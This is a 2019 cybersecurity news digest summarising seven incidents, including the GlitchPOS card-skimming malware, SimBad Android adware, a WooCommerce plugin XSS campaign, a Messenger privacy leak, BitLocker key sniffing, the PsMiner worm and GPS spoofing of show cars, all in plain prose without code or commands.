15 March 2019
New GlitchPOS malware skims credit card numbers from the memory of the infected POS systems
A new malware strain has been found targeting firms in retails and hospitality sector. Dubbed as ‘GlitchPOS’, the POS malware is being sold by cybercriminals on a crimeware forum. In a blog post, Cisco Talos researchers described that the cybercriminals have released a video that comes with a set of instructions on ‘How to use the malware?’ For this, they are leveraging the phishing emails that contain a fake game featuring a cute cat. In this way, they fool the users who unknowingly download the malware by clicking on the video. Once installed, GlitchPOS connects to a command and control (C2) server. The commands that are received from the C2 server are executed via a shellcode. According to Cisco researchers, a malware author who goes by the name of Edbitss is behind the GlitchPOS. The same author is alleged to have developed the DiamondFox L!NK botnet in 205/2016 and 2017. Although the malware is being marketed globally, experts claim that residents of the US are the primary target of Glitch POS.
Android Adware ‘SimBad’ detected in 206 Android apps with almost 150 million installs
Researchers from Check Point detected Android adware dubbed ‘SimBad’ in almost 206 Android applications that are available for download in the Google Play Store. These applications were installed by almost 150 million Android users. The adware exists in the RXDrioder Software Development Kit (SDK) that allowed attackers to display ads on an Android device when the device was booted or the user unlocks the screen. Most of the apps that included the adware were driving and racing simulator games such as Snow Heavy Excavator Simulator, Ambulance Rescue Driving, and Water Surfing Car Stunt. Check Point researchers notified Google about the adware, and Google has removed all the 206 apps from the Google Play Store. Google responded quickly. It took them a couple of weeks to review the apps and conduct their own investigation until the apps were finally removed.
Hackers abuse XSS vulnerability in cart plugin to target WordPress-based shopping sites
WordPress-based shopping sites are being targeted by cybercriminals to plant backdoors and take control of other vulnerable sites. The cyber crooks are abusing a vulnerability in a shopping cart plugin ‘Abondoned Cart Lite for WooCommerce’ to target the sites. According to Defiant, the company behind Wordfence, hackers are targeting WordPress sites that use the ‘Abondoned Cart Lite for WooCommerce’ plugin. It is reported that the plugin has been installed for more than 20,000 times across several WordPress sites. The plugin, allows site administrators to view abandoned shopping cart - where users add the required products in their carts before they suddenly leave the site. The hackers leveraging the cross-site scripting (XSS) vulnerability in the plugin to create the perfect storm. They add exploit code in one of the shopping cart’s fields and then leave the site. In this way, the injected exploit code gets stored in the shop’s database without the knowledge of the owner. The attackers make use of URL shortening services like ‘bit.ly’ to load the exploit code on to the sites running the vulnerable plugin. When an admin accesses the shop’s backend to view a list of abandoned carts, the hackers’ exploit code gets executed.
Bug in Facebook Messenger allows attackers to see who users chat with
It seems that security and privacy woes continue to trouble Facebook. In a recent incident, Ron Masas, a security researcher at Imperva discovered a security bug in the platform’s messaging website Messenger. This flaw was found in the application’s desktop website. Attackers could insert malicious links which upon clicking, would allow them to see users’ conversations. The number of iframes loaded in the page gives information about the state of the webpage. As per the researcher's blog, "When the current user has not been in contact with a specific user, the iframe count would reach three and then always drop suddenly for a few milliseconds. This lets an attacker reliably distinguish between the full and empty states. This could let him remotely check if the current user has chatted with a specific person or business, which would violate those users’ privacy." Thus, the researcher was able to leak the state of the cross-origin window by analyzing the raw pattern of iframe count over time or by timing certain “milestones” of the pattern. When the researcher reached out to Facebook regarding the security issue, they tried randomizing the number of iframes on the page. However, the researcher could still adapt his algorithm to leak the state. Finally, Facebook removed all the iframe elements present in the user interface of Messenger to get rid of the issue.
New attack could extract BitLocker encryption keys from a TPM
A security researcher from Pulse Security named Denis Andzakovic has come up with a new attack vector that could extract BitLocker encryption keys from a computer’s TPM (Trusted Platform Module). All it requires to extract BitLocker keys is a $27 FPGA board and some open-sourced code or a Logic Analyzer. “By default, Microsoft BitLocker protected OS drives can be accessed by sniffing the LPC bus, retrieving the volume master key when it’s returned by the TPM, and using the retrieved VMK to decrypt the protected drive. This post will look at extracting the clear-text key from a TPM chip by sniffing the LPC bus, either with a logic analyzer or a cheap FPGA board,” Andzakovic said. To be precise, this attack would require physical access to a device, which means an attacker needs to hardwire equipment into the system’s motherboard or TPM chip and sniff communications via the Low Pin Count (LPC) bus. The attacker could then access the highly valuable information such as proprietary business documents, cryptocurrency wallet keys, and other sensitive data stored in the system.
PsMiner propagates by exploiting known vulnerabilities and weak credentials
360 Total Security team uncovered a new Monero mining malware dubbed ‘PsMiner’ that is written in the Go language and includes worm-like capabilities. The malware spreads by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, Weblogic, ThinkPHP, and SQL server. It also spreads using weak system credentials. PsMiner can brute-force the weak or default system credentials by its password cracking module. After successful exploitation of vulnerabilities or weak credentials, the malware can execute Powershell command in the victim’s machine using cmd.exe. The executable will download a ‘WindowsUpdate.ps1’ malicious payload, which will drop the Monero miner. PsMiner will then use the open source Xmrig CPU miner to mine for Monero cryptocurrency. In order to stay protected from such malware, it is highly recommended to patch all known vulnerabilities and users should upgrade to the patched versions. It is also recommended to reset all default passwords to strong, unique, and complex passwords.
Seven car manufacturers hit by GPS spoofing attacksAt least seven car manufacturers were hit by GPS spoofing attacks that took place at the annual Geneva Motor show last week. According to Jalopnik, attackers leveraged the bug in the default ‘Location’ setting of the LabSat device and changed the locations of many cars to Buckingham. In addition to this, the attackers were also able to change the current year shown on the GPS systems as 2036. The car manufactures affected by this false GPS signaling are Audi, Peugeot, Renault, Rolls-Royce, Volkswagen, Daimler-Benz, and BMW. Preparators had spoofed the GPS signals of LabSat device in order to cause real troubles for drivers. By spoofing the false GPS signals, they created confusion among the drivers by showing them wrong dates and locations. The GPS spoofing attack will not only put the drivers in confusion but can also make automatic cars extremely vulnerable to attacks. It is still unknown if any threat actor was involved in the attack or whether it was accidental.